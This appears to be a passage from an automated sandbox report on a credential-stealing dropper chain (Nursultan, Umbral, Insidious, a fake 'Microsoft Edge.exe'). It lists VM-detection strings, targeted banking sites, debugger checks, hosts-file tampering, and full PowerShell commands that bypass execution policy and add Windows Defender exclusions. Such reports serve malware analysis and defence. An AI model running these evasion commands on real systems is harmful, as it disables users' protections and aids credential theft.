                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 922337203685477
                            Source: Umbral.exe.4.drBinary or memory string: vboxservice
                            Source: Nursultan.exe, 0000003B.00000002.2225928344.0000000000A07000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yQ
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: global block list test formVMware20,11696428655
                            Source: Umbral.exe.4.drBinary or memory string: vmsrvc
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E46000.00000004.00000800.00020000.00000000.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.drBinary or memory string: qemu-ga
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: AMC password management pageVMware20,11696428655
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: tasks.office.comVMware20,11696428655o
                            Source: Microsoft Edge.exe.0.drBinary or memory string: vmware
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                            Source: Nursultan2.exe, 00000019.00000002.2159590336.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSIdRom&Ven_NECVMWar&Prod_VMware_
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E46000.00000004.00000800.00020000.00000000.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.drBinary or memory string: vmusrvc
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                            Source: Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: discord.comVMware20,11696428655f
                            Source: Umbral.exe.4.drBinary or memory string: vmwareuser
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                            Source: Insidious.exe, 0000000B.00000002.2243166969.000002452AD18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(}=$
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                            Source: Nursultan.exe, 0000001C.00000002.2165170915.0000000001567000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\NRo
                            Source: Microsoft Edge.exe, 00000003.00000002.3341120459.000000001BDC0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlll
                            Source: Umbral.exe.4.drBinary or memory string: vmwaretray
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                            Source: Umbral.exe, 0000000E.00000002.2585825077.000001DCB41E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: Nursultan.exe, 0000001C.00000002.2176831345.000000001C000000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD04&
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: outlook.office.comVMware20,11696428655s
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                            Source: Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB5E46000.00000004.00000800.00020000.00000000.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.drBinary or memory string: vboxtray
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: dev.azure.comVMware20,11696428655j
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                            Source: Umbral.exe.4.drBinary or memory string: vmwareservice+discordtokenprotector
                            Source: Umbral.exe.4.drBinary or memory string: vmtoolsd
                            Source: Nursultan2.exe, 00000004.00000002.2102783475.0000000001178000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: tmp28E5.tmp.dat.11.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                            Source: Nursultan2.exe, 0000003A.00000002.2250754170.000000001B730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess information queried: ProcessInformationJump to behavior

                            Anti Debugging

                            barindex
                            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeCode function: 3_2_00007FF848E57A81 CheckRemoteDebuggerPresent,3_2_00007FF848E57A81
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess queried: DebugPortJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeProcess token adjusted: Debug
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\Nursultan.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe'
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe'
                            Bypasses PowerShell execution policy
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'
                            Modifies the hosts file
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeFile written: C:\Windows\System32\drivers\etc\hosts
                            Passes commands via pipe to a shell (likely to bypass AV or HIPS)
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe'Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe" Jump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode con: cols=103 lines=21
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Umbral.exe'
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode con: cols=103 lines=21
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Insidious.exe "C:\Users\user\AppData\Local\Temp\Insidious.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe "C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan2.exe "C:\Users\user\AppData\Local\Temp\Nursultan2.exe"
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Users\user\AppData\Local\Temp\Nursultan.exe "C:\Users\user\AppData\Local\Temp\Nursultan.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ECHO prompt $E | cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout 4 /nobreak
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\nursultan.bat" "
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" ECHO prompt $E "
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Users\user\AppData\Local\Temp\Insidious.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                            Source: C:\Users\user\Desktop\Nursultan.exeQueries volume information: C:\Users\user\Desktop\Nursultan.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan2.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan2.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Nursultan.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Nursultan.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
